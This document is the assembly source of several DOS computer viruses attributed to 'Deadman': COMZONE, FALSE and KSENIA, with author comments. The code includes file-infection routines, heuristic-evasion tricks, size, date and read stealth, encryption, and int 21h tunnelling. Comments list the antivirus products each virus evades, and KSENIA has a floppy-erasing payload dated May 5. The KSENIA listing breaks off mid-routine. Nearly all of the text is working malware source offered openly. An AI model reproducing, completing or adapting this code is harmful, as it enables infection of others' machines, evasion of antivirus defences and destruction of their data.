[COMZONE.ASM] comment % Comzone Executer Virus Copyright (C) 1999 by Deadman COM/TSR non-overwriting infector Some comments: First, virus will fool a heuristic analysis through mov ax,1200h/int 2fh. So, al will be equal 0FFh (MS-DOS installation check, for OS/2 compatibility). But under analysis al will not be equal 0ffh, and virus will erase its body with 90h (nop instruction) value. And, analyzer will have an encountered nop instructions and will pass an infected program. Fooled antiviruses: F-Prot 3.03a, DrWeb 4.03, Aidstest. AVP/AVPLite 3.0 - Type_ComTSR TBScan 7.04 - 4 flags set (F#Mt), probably infected with an unknown virus ;( Also virus has a date triggered event, it'll display a string on New Year Then virus will check memory infection (mov ax,1898h/int 21h/cmp ax,9818h), and if no virus copy installed, it'll copy its body over the infected program, after the PSP (CS:0100), and return there. There virus will hook int 21h, resize memory block, find infected program's name in environment, store stack address, and execute an infected program through 4bh func- tion of int 21h, subfunction 00. After the program being executed virus will restore SS:SP pair (uses new 80386 instruction, LSS SP,DWORD PTR), and stay resident in memory using legal method (function 31h) with 00 errorlevel. On int 21h call virus waits 4b00h function and infects the program being executed, hooking an int 24h handler, saving file time and date, checking file size overflow. Also virus checks first two bytes for MZ/ZM signature. Virus length = 512 (200h) bytes Negative Checksum = 0FFF8F678h Destructive actions - none Deadman. % model tiny codeseg org 100h .386 start: mov ax,1234h push ax bx cx dx si di bp es ds mov ax,1200h push ds xor si,si mov ds,si pushf call dword ptr ds:[2fh*4] pop ds xor al,0ffh jz no_heur call next next: pop di add di,no_heur-next mov al,90h mov cx,1000h rep stosb no_heur: mov ah,2ah int 21h cmp dx,0c1eh jne install call string string: pop dx add dx,outp-string mov ah,9 int 21h jmp $ install: mov ax,1898h int 21h cmp ax,9818h je here mov di,100h call delta delta: pop si sub si,delta-start mov cx,vsize rep movsb push offset continue ret continue: mov ax,3521h int 21h mov io21,bx mov io21+2,es mov ah,25h lea dx,int21 int 21h mov ah,4ah mov bx,(vsize+100h)/16+2 push cs pop es int 21h mov seg0,cs mov seg1,cs mov seg2,cs mov si,2ch mov ds,[si] xor ax,ax xor si,si get_host: cmp word ptr [si],ax je got_host inc si jmp get_host got_host: lea dx,[si+4] mov ax,4b00h lea bx,epb mov cs:_sp,sp mov cs:_ss,ss int 21h lss sp,dword ptr cs:_sp mov es,cs:[2ch] mov ah,49h int 21h mov ax,3100h mov dx,(vsize+100h)/16+2 xor si,si mov ds,si mov si,84h pushf call dword ptr [si] here: pop ds es mov di,100h call get_orig get_orig: pop si add si,prev-get_orig movsw movsb pop bp di si dx cx bx ax db 68h,0,1,0c3h db '[ COMZONE ]',0 outp db 'ComZone Executer Copyright (c) 1999 by Deadman',0dh,0ah,24h prev db 0c3h,0,0 epb dw 0h ; dw 80h ; ப seg0 dw ? ; dw 5ch ; ࢮ FCB seg1 dw ? ; dw 6ch ; ண FCB seg2 dw ? ; int21: xchg ax,bx cmp bx,4b00h xchg ax,bx je infect cmp ax,1898h jne exit mov ax,9818h iret exit: db 0eah io21 dw 0,0h infect: pusha push ds mov bp,ds xor ax,ax mov ds,ax mov si,24h*4 push word ptr [si] push word ptr [si+2] mov word ptr [si],offset int24 mov word ptr [si+2],cs mov ds,bp mov ax,3d02h int 21h jc fail xchg ax,bx mov ax,5700h int 21h push cx dx mov ah,3fh mov cx,3 push cs pop ds lea dx,prev int 21h xor cx,ax jnz close mov ax,word ptr prev xor ax,5050h cmp ax,'MZ' XOR 5050h je close cmp ax,'ZM' XOR 5050h je close mov ax,4202h cwd int 21h or dx,dx jnz close cmp ax,63000 ja close cmp ax,1024 jb close cmp byte ptr prev,0e9h jne not_inf mov cx,ax sub cx,vsize cmp word ptr prev+1,cx je close not_inf: mov word ptr jump+1,ax mov ah,40h mov cx,vsize mov dx,100h int 21h jc close xor cx,ax jnz close mov ax,4200h cwd int 21h mov ah,40h mov cx,3 lea dx,jump int 21h close: pop dx cx mov ax,5701h int 21h mov ah,3eh int 21h fail: push 0 pop ds mov si,24h*4 pop word ptr [si+2] pop word ptr [si] pop ds popa jmp exit int24: mov al,3 iret jump db 0e9h,0,0 eov: vsize equ $-start _sp dw ? _ss dw ? end start [COMZONE.ASM] [FALSE.ASM] jumps model tiny codeseg start: push bx cx dx si di bp es ds push cs pop es mov ax,1200h int 2fh cmp al,0ffh sbb ch,ch mov cl,1 lea di,stosed mov al,90h rep stosb stosed: nop mov ax,4408h xor bx,bx int 21h or ax,ax jz exit mov si,81h cmd: lodsb cmp al,' ' jne ign cmp byte ptr [si],'*' jne ign lea si,scre hi: lods byte ptr cs:[si] cmp al,0 jz eol mov dl,al mov ah,2 int 21h mov cx,225 delay: push cx mov cx,-1 loop $ pop cx loop delay jmp hi eol: jmp $ ign: cmp al,0dh jne cmd mov ah,2fh int 21h push es bx push cs cs pop ds es mov ah,1ah lea dx,dta int 21h mov ah,4eh mov cx,0e7h lea dx,exe fnext: int 21h jc no_more lea dx,dta+1eh call infect_exe mov ah,4fh jmp fnext no_more: mov ah,1ah pop dx ds int 21h exit: pop ds es mov ax,ds add ax,10h add word ptr cs:_cs,ax add word ptr cs:_ss,ax pop bp di si dx cx bx db 0b8h _ss dw 0 mov ss,ax db 0bch _sp dw 0 db 0eah _ip dw 000h _cs dw -10h infect_exe proc near push word ptr _ss push word ptr _sp push word ptr _ip push word ptr _cs mov ax,4301h xor cx,cx int 21h mov ax,3d02h int 21h jc atr xchg ax,bx mov ah,3fh mov cx,28 lea dx,buffer int 21h cmp ax,cx jnz close cmp word ptr buffer,'ZM' jne close cmp word ptr buffer+12h,'aF' je close cmp byte ptr buffer+18h,40h je close mov ax,512 mov cx,word ptr buffer+4 cmp word ptr buffer+2,0 jz $+3 dec cx mul cx add ax,word ptr buffer+2 adc dx,0 xchg ax,si xchg dx,di mov dx,word ptr dta+1ah+2 mov ax,word ptr dta+1ah cmp dx,6 ja close cmp ax,si ; compare its jne close cmp dx,di jne close mov si,word ptr buffer+14h mov word ptr _ip,si mov si,word ptr buffer+16h mov word ptr _cs,si mov si,word ptr buffer+0eh mov word ptr _ss,si mov si,word ptr buffer+10h mov word ptr _sp,si push ax dx ; get location in exe file mov cx,16 div cx sub ax,word ptr buffer+8 mov bp,16 sub bp,dx inc ax cwd mov word ptr buffer+14h,dx mov word ptr buffer+16h,ax inc ax ; special for TBAV mov word ptr buffer+0eh,ax mov word ptr buffer+10h,1000h pop dx ax add ax,vsize adc dx,0 add ax,bp adc dx,0 mov cx,512 div cx or dx,dx jz $+3 inc ax mov word ptr buffer+2,dx mov word ptr buffer+4,ax mov word ptr buffer+12h,'aF' mov ax,5700h int 21h push cx dx mov ax,4202h xor cx,cx cwd int 21h mov ah,40h mov cx,bp int 21h mov ah,40h mov cx,vsize cwd int 21h xor cx,ax jnz res_dda mov ax,4200h cwd int 21h mov ah,40h mov cl,28 lea dx,buffer int 21h res_dda: pop dx cx mov ax,5701h int 21h close: mov ah,3eh int 21h atr: mov ax,4301h xor cx,cx mov cl,byte ptr dta+15h lea dx,dta+1eh int 21h pop word ptr _cs pop word ptr _ip pop word ptr _sp pop word ptr _ss ret infect_exe endp exe db '*.exe',0 db '[FALSE]',0 db 'Copyright (C) 1998-99 by Deadman',0 scre db 'It seems to be all right',0dh,0ah,0 vsize equ $-start dta db 43 dup (?) buffer label byte end start [FALSE.ASM] [KSENIA.ASM] comment ^ KSENIA Virus Copyright (C) 1998-99 Deadman Pre-release Version (0.99 alpha). E-Mail: dman@mail.ru TSR/COM/EXE/SYS non-overwriting infector Infects on 3Dh/43h/4Bh/56h/6Ch (Open/ChMOD/Exec/Rean/ExtOpen) Size stealth on 11h/12h/4Eh/4Fh (Find First/Next FCB/DTA) Redirection stealth on 3Fh/42h (Read/LSeek) Disinfects the host on 40h (Write) Date stealth on 5700h/5701h (Get/Set File time/date) Uses Low memory addresses Encrypted. Uses XOR/ADD/SUB/NOT/INC/DEC/ROR/ROL/NEG encryptors Creates random 16-bit decryption key (value) Encrypts the decryption routine via simple XOR Doesn't infect files with a current hour stamp Doesn't infect files beginning on FI (FindVirus) SC (McAfee Scan) VS (McAfee VShield/Microsoft VSafe) TB (ThunderByte shit) DR (Doctor Web) AV (AntiViral Toolkit Pro) F- (F-Protect) FP (F-Protect) CO (Command Interpreter) Disable stealth on running programs (through MCB Owner) PKZIP Ŀ RAR ARJ Archivers LHA ARC DEFRAG Ŀ SPEEDISK CHKDSK BACKUP To avoid errors MSBACKUP SCANDISK NDD Anti-AV routines (Heuristic/Encryption) DrWeb 3.24/4.00 - No detection AVP/AVPLite 3.0 - No detection F-Prot 3.03a - No detection NAV 4.0 (Bloodhound) - No detection MSAV - No detection TbScan 7.04 - No detection, "T" flag set TbClean - Can't emulate ;( ... Gets the original int 21h vector uses tunneling method Uses SPLICE technology, simple anti-bug trick on windows run On May, the 5-th virus will erase every diskette you will insert Novell Network shit, depends on system time ^ vsize equ eov-ksenia ; virus size msize equ eom-ksenia ; memory needed for virus model tiny codeseg .386 ; e?x and dwords enabled :) ksenia: push ax bx cx dx si di bp es ds cld ; take down VSafe xor ax,ax ; ax FA01 mov ds,ax ; dx 5945 mov ax,0fa01h ; int 16 mov dx,05945h pushf ; avoid TBScan stealth flag (X) call dword ptr ds:[58h] call extra ; calculate extra offset xor dx,dx ; dx=0 mov ax,1200h pushf call dword ptr ds:[0bch] sub al,0ffh ; no analysise => al=ff sbb dh,0 ; if yes => dh<>0 cli ; disable interrupts mov si,09h*4 ; si=int 09h vector mov ax,0ffffh push word ptr [si] ; save offset on stack mov [si],ax ; break it sub [si],ax ; breaked? pop word ptr [si] ; restore offset sti sbb dh,0 ; if not => dh<>0 lea di,kill_vir+bp ; store dx+1 nop after kill_vir label push cs ; pop es mov cx,1 add cx,dx mov al,90h rep stosb kill_vir: nop call crypt ; decrypt virus in memory enc_start: cmp word ptr cs:[original+bp],0ffffh ; started from SYS? jne no_sys lea si,original+bp+6 ; reset interrupt and mov di,6 ; strategy offset push cs cs pop ds es movsw movsw mov ax,0ba00h ; move virus body into video memory mov es,ax ; at BA00:0000 xor di,di mov si,bp mov cx,msize rep movsb pop ds es bp di si dx cx bx ax ; restore registers push 0ba00h offset sys_return ; return address jmp word ptr cs:[8] ; call original routine sys_return: push ax bx cx dx si di bp es ds ; staying resident after the driver ; is installed xor bp,bp ; extra offset = 0 mov ax,18ddh ; already installed? int 21h cmp ax,303h ; if yes, so return to dos je complete les bx,dword ptr cs:req_head ; request header mov ax,word ptr es:[bx+0eh] ; last byte after the driver cmp ax,55000 ; installation. Is there enough ja complete ; memory to append? add word ptr es:[bx+0eh],msize ; increase last byte value shr ax,4 ; getting new CS inc ax add ax,word ptr es:[bx+10h] mov es,ax jmp move_it ; ---- COM/EXE installation --- no_sys: mov ax,18ddh int 21h cmp ax,303h je complete mov ah,62h ; psp address int 21h mov cs:psp+bp,bx add bx,10h ; moving virus body over the infected program mov es,bx move_it: xor di,di mov si,bp mov cx,msize push cs pop ds pushf push es offset zero_bp cli mov bp,sp sub bp,7 mov word ptr [bp],0a4f3h ; rep movsb instruction mov byte ptr [bp+2],0cfh ; iret opcode push ss bp retf zero_bp: sti push cs pop ds mov resthost,0 mov ax,psp mov seg0,ax mov seg1,ax mov seg2,ax mov point,offset keyword call cr21z ; int 21h vector search call restorehost xor ax,ax ; ds=0 mov ds,ax ; setting new int 09h vector mov si,09h*4 ; lea di,io9 movsw movsw mov word ptr [si-4],offset int9 mov word ptr [si-2],es cmp word ptr cs:original,0ffffh je complete mov es,cs:psp mov ah,4ah mov bx,(msize+100h)/16+2 int 21h mov si,2ch ; environment segment mov ds,es:[si] xor ax,ax xor si,si get_host: cmp word ptr [si],ax ; looking for the 0000h word je got_host inc si jmp get_host got_host: lea dx,[si+4] ; dx -> infected program's name mov ax,4b00h ; executing program lea bx,epb push cs pop es cli xor si,si mov ss,si mov sp,600h+256 int 21h cli xor ax,ax mov ss,ax mov sp,600h+256 sti mov ax,cs:psp dec ax mov ds,ax xor si,si mov al,4dh xchg al,byte ptr [si] mov byte ptr [si+100h],al mov word ptr [si+3],0fh mov word ptr [si+103h],msize/16+2 mov word ptr [si+101h],8 mov ah,4dh ; exit code in AL int 21h mov ah,4ch ; DOS program terminate int 21h complete: pop ds es ; ⠭ ᥣ mov ax,es ; ॣ ࠭ 祭 ax lea si,original+bp ; si-࠭ 砫 mov cx,word ptr cs:[si] cmp cx,'MZ' ; 㤠 ⮢? je run_exe ; 'MZ' 'ZM' -> 譨 cmp cx,'ZM' ; 0ffffh -> SYS je run_exe ; inc cx jz run_sys mov di,0100h ; ⮢ , movsw ; ⠭ 砫 movsb pop bp di si dx cx bx ax db 0ebh,1 ; 6890h mov sp,6890h ; -nop/push 0100 db 0,1 db 0ebh,1 ; C3h mov al,0c3h ; ⮡ ret run_exe: add ax,010h ; ⠭ 譨 mov dx,cs:[si+14h] ; ஥ IP mov cs:_ip+bp,dx mov dx,cs:[si+16h] ; ஥ CS add dx,ax ; + PSPSeg+10h mov cs:_cs+bp,dx mov dx,cs:[si+10h] ; ஥ SP mov cs:_sp+bp,dx add ax,cs:[si+0eh] ; ஥ SS mov cs:_ss+bp,ax pop bp di si dx cx bx ax cli db 0bch ; _ss dw ? ; cli mov ss,sp ; mov sp,ss_value db 0bch ; mov ss,sp _sp dw ? ; mov sp,sp_value sti ; sti db 0eah ; far jump instruction _ip dw ? _cs dw ? run_sys: pop bp di si dx cx bx ax retf pushall macro pushf push ax bx cx dx si di bp ds es endm popall macro pop es ds bp di si dx cx bx ax popf endm copyright db '[KSENIA]',0 db 'Version 0.99 alpha',0 db 'Copyright (C) ',??date,20h,??time,' by Deadman',0 db 'The Global Project devoted to Ksenia Chizhova',0 nmess db 'External System Error #05. Connection refused.',0 endnmess: wino32bit db ' /d:c',0dh stdisable db 'PKZIP',0 db 'RAR',0 db 'ARJ',0 db 'LHA',0 db 'ARC',0 db 'DEFRAG',0 db 'SPEEDISK',0 db 'CHKDSK',0 db 'BACKUP',0 db 'MSBACKUP',0 db 'SCANDISK',0 db 'NDD',0 db 0ffh funcs db 18h XOR 25h dw tsrtest db 0eh XOR 25h dw select db 3dh XOR 25h dw infect db 43h XOR 25h dw infect db 4bh XOR 25h dw infect db 56h XOR 25h dw infect db 6ch XOR 25h dw extinfect db 11h XOR 25h dw fcbstealth db 12h XOR 25h dw fcbstealth db 4Eh XOR 25h dw dtastealth db 4Fh XOR 25h dw dtastealth db 00h XOR 25h dw terminate db 31h XOR 25h dw terminate db 4Ch XOR 25h dw terminate db 32h XOR 25h dw getdpb db 42h XOR 25h dw seekstealth db 3fh XOR 25h dw readstealth db 40h XOR 25h dw writehandler db 57h XOR 25h dw datestealth endf: original db 0c3h,27 dup (0) epb dw 0h ; dw 80h ; ப seg0 dw ? ; dw 5ch ; ࢮ FCB seg1 dw ? ; dw 6ch ; ண FCB seg2 dw ? ; keyword db 25h+80h,1Fh+80h,12h+80h,31h+80h,17h+80h,1Eh+80h copy db '123 4 5 Deadman' endcopy: smb_pattern db 10100111b db 10100100b db 11000111b db 10100001b db 10100111b db 00000000b db 00000000b db 01111110b db 10000001b db 01111110b db 00000000b db 00000000b db 00000000b db 00000000b db 11101001b db 10001001b db 11101101b db 10001011b db 11101001b db 00000000b db 00000000b db 01111110b db 10000001b db 01111110b db 00000000b db 00000000b db 00000000b db 00000000b db 11100110b db 01001001b db 01001111b db 01001001b db 11101001b db 00000000b db 00000000b db 01111110b db 10000001b db 01111110b db 00000000b db 00000000b db 00000000b db 00000000b db 00000000b db 00000000b db 00000000b db 00111100b db 01000010b db 10011001b db 10100001b db 10100001b db 10011001b db 01000010b db 00111100b db 00000000b db 00000000b db 00000000b db 00000000b db 00000000b db 11101001b db 10101001b db 10101001b db 10101001b db 11101001b db 11001111b db 10100001b db 10100001b db 10100001b db 11101110b db 00000000b db 00000000b ; ࠡ稪 뢠 21 tsr: pushf cmp cs:resthost,0 je usual_work popf mov cs:resthost,0 push bp ax si ds mov bp,sp sub word ptr [bp+8],2 lds si,dword ptr [bp+8] mov ax,cs:keepword mov [si],ax call restorehost pop ds si ax bp iret usual_work: push ds si ax ; ࠭ ॣ lds si,dword ptr cs:io21 ; 㧨 mov ax,word ptr cs:prev2 ; ࠡ稪 int 21h mov word ptr [si],ax ; 稭 pop ax push ax xchg al,ah xor al,25h xor si,si ; 饬 ⠡ findfunc: cmp al,cs:funcs+si ; 㭪樨, ᥩ jne wrongfunc ; 뢠 call verifymcb ; 諨 - ஢ mcb mov ax,word ptr cs:funcs+si+1 ; ᬥ饭 quit_manager: mov word ptr cs:func_jump,ax pop ax si ds ; ࠡ稪 ⮩ 㭪樨 popf ; ⠭ mov cs:func_number,ax push cs:func_jump ; ᫠ ࠡ稪 ret wrongfunc: add si,3 ; ६ ᫥ 㭪 cmp si,endf-funcs ; ⠡ jb findfunc ; 磌? lea ax,exithandler jmp quit_manager ; Infect a file extinfect: pushad mov dx,si jmp realinfect infect: pushad realinfect: push ds es ; ࠭ ॣ cmp ax,4b00h jne no_novell_check call novell ; 䠪  no_novell_check: push ds ; ࠭ eax,ds push 0 ; ds 㤠 0 pop ds mov si,24h*4 mov eax,[si] ; ࠭ 24- mov dword ptr cs:io24,eax ; ⠭ ᢮ mov word ptr [si],offset int24h ; 祭 ஡ mov word ptr [si+2],cs ; ᭨⥫ pop ds mov cx,128 ; 㥬 䠩 mov di,dx ; 饬 get_end: mov al,[di] inc di or al,al loopnz get_end jz got_end ; ⥭? huy: jmp noinf got_end: dec di mov al,[di] ; ப cmp al,'.' ; 砫 ७? je got_pixel cmp al,'\' ; 砫 ⠫? je huy cmp al,':' ; ID ᪠? je huy cmp di,dx ; 砫 ப? ja got_end jmp huy got_pixel: mov ax,[di+2] ; ᨬ call upreg ; ७ shl eax,16 mov ax,[di] call upreg cmp eax,'SYS.' je good_ext cmp eax,'MOC.' je good_ext cmp eax,'EXE.' jne huy good_ext: xchg bp,ax call filenamecheck ; ஢ 䠩 jc huy mov ax,4300h ; ਡ 䠩 call int21 jc huy mov si,cx ; ࠭ si mov ax,4301h ; ⠭ ଠ ones xor cx,cx call int21 jc huy push si ds dx ; ࠭ 㪠⥫ mov ax,3d02h ; 䠩 call int21 ; ⥭/ jc restoreattr xchg ax,bx ; hanlde bx push cs cs ; ds es 뢠 pop ds es call handlecheck ; ஢ 䠩 । jc forcedclose ; ᪮ call seek2eof ; ᫨誮 让? cmp dx,10 ; Divide Overflow jae close ; 筥 륡뢠 call seek2bof ; ⭮ call inf? ; ஢, - jc close ; ஢ ᮬ mov ah,3fh ; 28 mov cx,28 ; ds:original lea dx,original call int21 cmp cx,ax ; ⠫? jne close lea si,original ; ᤥ lea di,buffer mov cx,28 cld rep movsb lea si,original ; no comments lea di,buffer mov ax,[si] ; ax 2 cmp bp,'S.' je infect_sys cmp ax,'ZM' ; ⠪ ? je infect_exe cmp ax,'MZ' je infect_exe call cominfect jmp analyse infect_exe: call exeinfect jmp analyse infect_sys: call sysinfect analyse: jc close ; call writevirus ; close: call correctdate forcedclose: mov ah,3eh ; - ⮡ call int21 restoreattr: pop dx ds cx ; ⠭ ਡ mov ax,4301h call int21 noinf: push 0 ; ⠭ 24- pop ds push eax mov eax,dword ptr cs:io24 ; mov dword ptr ds:[24h*4],eax ; 뢠 24 pop eax pop es ds ; ⠭ ॣ popad jmp exithandler ; .. ; Select disk ; Disk erasing on holidays select: pusha cmp dl,2 ; ᪠, ᫨ ⠭ jae not_floppy ; ⥪騬 ࠥ ᪥ mov bp,dx mov ah,2ah ; call int21 cmp dx,0505h ; 05.05.XXXX? mov dx,bp jne not_floppy inc dl ; 㧭, ᪮쪮 ᥪ஢ ᪥ mov ah,36h call int21 inc ax jz not_floppy dec ax mul dx mov cx,ax mov dx,1 ; ண ᥪ (⮡ 类 dec cx ; ) mov ax,bp int 26h popf not_floppy: popa jmp exithandler ; fcb size/date stealth called by 11h/12h ; no extension check (see above) fcbstealth: call int21 ; find file! pushall ; save all 16-bit registers (exc. SP) cmp al,0FFh ; no more filez? jz no_stealth ; nothing to do! cmp cs:stf,0 ; can we stealth? jnz no_stealth ; we can't stealth cmp cs:drf,0 ; can we stealth? jnz no_stealth ; we can't stealth mov ah,2Fh ; get current DTA address call int21 mov al,0FFh ; al = FF cmp es:[bx],al ; FCB is extended? jne no_ext ; not extended! add bx,7 ; else 7 extra bytes no_ext: lea si,[bx+14h] ; si points to file date lea di,[bx+1Dh] ; di points to file size call sizst ; stealth real file size! jmp no_stealth ; show the false to user! ; date stealth called by 57h datestealth: or al,al jnz set_date call int21 call hidestm jmp ireturn set_date: call int21 call correctdate jmp ireturn ; dta size/date stealth called by 4Eh/4Fh ; no extension check (infected.exe could be renamed to fuckup.fun) dtastealth: call int21 ; find file! pushall ; save all 16-bit registers (exc. SP) jc no_stealth ; nothing to do? cmp cs:stf,0 ; can we stealth? jnz no_stealth ; we can't stealth mov ah,2Fh ; get current DTA address call int21 lea si,[bx+18h] ; si points to file date lea di,[bx+1Ah] ; di points to file size call sizst ; stealth real file size! no_stealth: popall ; reset all 16-bit registers jmp ireturn ; show the false to user! ; ----= SIZE STEALTH =---- sizst: mov dx,word ptr es:[si] ; ax = filedate call hidestm ; verify and hide stamp jnc no_hide ; if no stamp set ;( mov word ptr es:[si],dx ; save it in DTA mov dx,word ptr es:[di+2] ; dx:ax = filesize mov ax,word ptr es:[di] sub ax,vsize sbb dx,0 jc no_hide stosw xchg ax,dx stosw no_hide: ret ; ----= DATE CORRECT =---- correctdate: mov ax,5700h ; dos function: get file time/date call int21 call hidestm ; reset file date stamp call inf? ; file is already infected? jnc perfectly ror dh,1 add dh,100 rol dh,1 perfectly: mov ax,5701h ; set new, corrected file stamp call int21 ret ; ----= HIDE STAMP =---- hidestm: push dx ; store dx on stack shr dh,1 ; get stamp in dh cmp dh,100 ; above 100? pop dx ; reset dx jb good_stm ror dh,1 ; prepare dx sub dh,100 ; hide real stamp rol dh,1 ; reset dx stc ret good_stm: clc ret ; allow/disable fcb stealth ; virus disables fcb stealth on get dpb (32h) to avoid chkdsk (or other shit) ; mistakes terminate: mov cs:drf,0 jmp runaway getdpb: mov cs:drf,1 runaway: jmp exithandler ; lseek stealth ; lseek' ⥫ seekstealth: cmp cs:stf,0 ; 直 RAR' ? jnz nostealth call handlecheck ; ᪮ 䠩? jc nostealth call inf? ; ஢? jnc nostealth cmp al,2 ; ਪ뢠 ? je hide_eof call int21 jc st_ret call seeksave call seekhide mov ax,cs:seek_pos mov dx,cs:seek_pos+2 clc st_ret: jmp ireturn hide_eof: sub dx,vsize sbb cx,0 nostealth: jmp exithandler ; read stealth readstealth: cmp cs:stf,0 ; 直 RAR' ? jnz nostealth call handlecheck ; ᪮ 䠩? jc nostealth call inf? ; ஢? jnc nostealth call int21 ; ⠥ jc st_ret pushf ; ࠭ ॣ pusha mov bp,dx ; 㤠 mov cs:nrbytes,ax ; ⢮ ⠭ cmp dword ptr cs:seek_pos,28 ; ? jae virsubtract call load_original ; ਣ쭮 砫 ⮣ 䠩 lea si,buffer ; ᬥ饭 砫 頥 add si,cs:seek_pos mov cx,cs:nrbytes ; ⠥ ⢮ 㦭 add cx,cs:seek_pos ; ⥫ cmp cx,28 jbe overwrite mov cx,28 sub cx,cs:seek_pos overwrite: mov al,cs:[si] ; ७ᨬ mov ds:[bp],al inc si inc bp loop overwrite virsubtract: call seeksave ; 塞 ६ "seek_pos" ⥪騬 call seekhide ; 祭 lseek' ⥫ᨬ popa ; 饭 䠩 popf mov ax,cs:nrbytes ; ⠫ ax ... jmp ireturn ; 稬 ᮭ⥫ ( - 뢠) writehandler: cmp cs:stf,0 ; 直 RAR' ? jne nowrite call handlecheck ; ᪮ 䠩? jc nowrite call inf? ; ஢? jnc nowrite call seeksave ; ࠭塞 㪠⥫ pusha ; ⨬ ॣࠬ push ds cs pop ds call load_original ; ਣ쭮 砫 -> call seek2bof ; 㪠⥫ -> 砫 䠩 mov ah,40h ; 襬 ਣ쭮 砫 䠩 mov cx,28 ; 28 lea dx,buffer call int21 jc disfail ; 訡? ⮣ ⮣, xor cx,ax ; 祣 訡 㤥 ⮦! jnz disfail mov cx,-1 ; 砫 ⥫ mov dx,-vsize ; ࠦ ணࠬ call seekfrom_eof mov ah,40h ; 㥬 䠩 (㤠塞 ⥫ xor cx,cx ; ᮭ⥫ call int21 mov ah,68h ; 襬 call int21 disfail: call restoreseek ; ⠭ lseek pop ds ; ⠭ ॣ popa nowrite: jmp exithandler ; 室 ; Ah=18h,AL=0DDh: TSR test tsrtest: cmp al,0ddh jne tsrexit mov ax,0303h jmp ireturn tsrexit: jmp exithandler ; > SUBROUTINES < ; ணࠬ ஢ન 䠩 (bx=handle) ࠦ ; cf=1 ᫨ ࠦ inf?: pusha ; ࠭ ⥪ ॣ push ds es push cs cs pop ds es call seeksave ; ࠭塞 lseek mov cx,-1 ; 砫 ணࠬ "extra" mov dx,-(eov-extra) ; ( 㤥 ᢥ) call seekfrom_eof mov ah,3fh ; ⠥ ணࠬ "buffer" mov cx,(eov-extra) lea dx,buffer call int21 call restoreseek ; ⠭ lseek xor cx,ax ; ⠫? jnz not_infected lea si,buffer lea di,extra mov cx,eov-extra cld repe cmpsb jne not_infected infected: stc pop es ds popa ret not_infected: clc jmp infected+1 ; ணࠬ 몠뢠 ਣ쭮 砫 ࠦ ணࠬ ; 室: bx - handler ; 室: "buffer" ਣ ஢ 砫 ; ࠭ lseek 䠩 load_original: pushall ; save all 16-bit registers (exc. SP) push cs cs pop ds es xor cx,cx ; remember the current lseek position xor dx,dx call seekfrom_cur push ax dx mov cx,-1 ; seek to the virus start (-vsize bytes mov dx,-vsize ; from end of file) call seekfrom_eof ; mov ah,3fh ; read virus body to the buffer mov cx,vsize lea dx,buffer call int21 pop cx dx ; ⠭ lseek call seekfrom_bof ; ࠦ ணࠬ mov byte ptr [buffer+(cr_ret-ksenia)],0cbh lea ax,buffer cwd mov cx,16 div cx mov cx,cs add ax,cx add dx,crypt-ksenia push cs offset retc push ax dx retf retc: lea si,[buffer+(original-ksenia)] lea di,buffer mov cx,28 cld rep movsb popall ret ; ࣨ᪠ ࠡ⪠ 뢠 int 21h cr21z: pusha ; ࠭ ॣ push ds es push cs cs pop ds es in al,40h sub al,70h jnc $-2 add al,80h+70h mov splint,al mov ah,25h lea dx,tsr int 21h cmp word ptr original,0ffffh jz my_int mov ax,1600h int 2fh or al,al jz no_win my_int: mov ax,3521h int 21h mov win21,bx mov win21+2,es mov ax,2521h lea dx,win_trick int 21h jmp motherfucker no_win: mov si,30h*4 ; ਣ 뢠 nextchain: ; int 21h cmp byte ptr [si],0eah ; אַ 쭨 ? jne another_way lds si,[si+1] ; 㧨 ds:si 뫪 cmp word ptr [si],9090h ; ⠬ 室 2 nop'? jnz nextchain sub si,32h ; ᫨ ࠭? cmp word ptr [si],9090h ; nop/nop je gotreal ; call far [....] another_way: cmp word ptr [si],2e1eh ; push ds jne motherfucker ; cs:[...]? add si,25h ; ? cmp word ptr [si],80fah ; cli je gotreal ; cmp ah,[..] motherfucker: ; ᫮... push 0 pop ds lds si,ds:[84h] ; , gotreal: mov cs:io21,si ; ᮢ뢠 諨 祩 mov cs:io21+2,ds mov ax,ds:[si] ; ⠥ 2 ࠡ稪 mov cs:prev2,ax ; ࠭塞 push cs pop ds mov ax,3501h int 21h mov io1,bx mov io1+2,es mov ax,2501h lea dx,trace int 21h pushf ; ࠭ ⥪ push cs ; push offset trace_post pushf ; ࠭ ⥪ 䫠 pop ax ; 祭 ⮬ ஢ or ah,1 push ax push dword ptr io21 ; 㧨 21- ࠡ稪 mov ah,30h ; 㭪 dos iret ; ३ ० ஢ trace_post: pop es ds ; 稫........... popa ret trace: push eax bp ds ; ஢ 21- mov ax,cs:io21 ; ᬥ饭 inc ax mov bp,sp cmp [bp+8],ax ; 믮 je nextcmd ; ࠡ稪? and word ptr [bp+12],0feffh ; 䫠 ஢ mov eax,[bp+8] ; ᫥饩 樨 mov dword ptr cs:_addr21,eax push 0 ; ds=0 pop ds push dword ptr cs:io1 ; ⠭ 1- pop dword ptr ds:[4] nextcmd: pop ds bp eax ; 室 뢠 iret ; ஢ ; Verifyes MCB owner verifymcb: pusha push ds es mov ah,62h ; get current psp segment call int21 dec bx ; get mcb segment mov ds,bx mov si,08h ; name of the owner lea di,stdisable cmpchar: mov al,[si] ; get char of the owner name call upreg cmp al,cs:[di] jne nextname or al,al jz the_same inc si inc di cmp si,10h je the_same jmp cmpchar nextname: inc di cmp byte ptr cs:[di],0 jne nextname inc di cmp byte ptr cs:[di],0ffh je the_different mov si,08h jmp cmpchar the_same: mov cs:stf,1 jmp quitvmcb the_different: mov cs:stf,0 quitvmcb: pop es ds popa ret ; sys infection called by infect, [di] = buffer sysinfect: cmp word ptr [di],0ffffh jne cierr call seek2eof or dx,dx jnz cierr cmp ax,65035-vsize ja cierr mov word ptr [di+8],ax add ax,(strategy-ksenia) xchg word ptr [di+6],ax mov word ptr old_strategy,ax clc ret ; com infection called by infect, [di] = buffer cominfect: cmp word ptr [di],0ffffh je cierr mov al,0e9h stosb call seek2eof or dx,dx jnz cierr cmp ax,65035-vsize ja cierr sub ax,3 stosw clc ret cierr: stc ret ; exe infection called by infect, [di] = buffer exeinfect: cmp byte ptr [di+18h],'@' ; NExe? je exerr mov ax,512 ; get file size from header mov cx,word ptr [di+4] cmp word ptr [di+2],0 jz $+3 dec cx mul cx add ax,word ptr [di+2] adc dx,0 xchg ax,si xchg dx,di call seek2eof ; and the real size cmp ax,si ; compare its jne exerr cmp dx,di jne exerr push ax dx ; get location in exe file mov cx,16 div cx sub ax,word ptr buffer+8 mov word ptr buffer+14h,dx mov word ptr buffer+16h,ax inc ax ; special for TBAV mov word ptr buffer+0eh,ax mov word ptr buffer+10h,3000h pop dx ax add ax,vsize 